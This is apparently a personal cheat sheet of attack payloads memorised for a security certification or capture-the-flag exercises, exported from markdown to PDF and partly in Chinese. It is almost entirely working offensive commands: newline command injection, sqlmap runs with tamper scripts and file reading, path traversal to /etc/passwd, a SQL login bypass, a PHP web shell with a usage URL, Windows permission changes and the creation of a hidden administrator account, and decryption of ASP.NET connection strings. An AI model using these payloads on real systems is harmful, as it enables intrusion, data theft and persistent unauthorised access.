nealwe cisp payload memorization


payload背诵.md to payload背诵.pdf by MARKDOWN-THEMEABLE-PDF

Command execution
%0a newline

ip=127.0.0.1%0als

Injection

D:\安全工具\漏洞利用\SQLMap\procs\mssqlserver

Using tamper scripts ( --tamper "space2comment,versionedmorekeywords.py" )

sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2comment,versionedmorekeywords.py" -v 3 --dbs

Reading files ( --file-read /tmp/key2 )

python sqlmap.py -u "http://172.18.0.15/id=-1'(*)%23" --tamper=space2comment --dbs -D security --file-read /tmp/key2

File inclusion
%00 truncation

/etc/passwd%00

../ truncation

../../../../../../../../../../../../etc/passwd

Search
dir C:\ /s /b | find "flag"

or for /r C:\ %i in (*flag*) do @echo %i

aspnet_regiis.exe decryption

aspnet_regiis.exe -pdf "connectionStrings" "c:\web"

http://www.freebuf.com/articles/web/55577.html

http://blog.csdn.net/zminr411421_/article/details/52115783

http://blog.csdn.net/qq_39591494/article/details/79206282


PAYLOAD

1. sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2comment,versionedmorekeywords.py" -v 3 --dbs

Page 1/2 © Copyright Sunday, Feb 4, 2018, 4:22 PM by COMPANYNAME



2. python sqlmap.py -u "http://172.18.0.15/id=-1'(*)%23" --tamper=space2comment --dbs -D security --file-read /tmp/key2

3. admin' Or '1' = '1 --+

4. <?PhP @system($_REQUEST['c']);?>
http://XXX.XXX.XXX.XXX/system/upload/XXX.php?c=cat ../../../key.php

5. for /r C:\ %i in (*flag.*) do @echo %i

6. cacls C:\users\... /E /C /G Administrator:F

7. ......exe -pdf connection C:\web

8. net user test test /ADD


net localgroup Administrators test /ADD

9. konboot
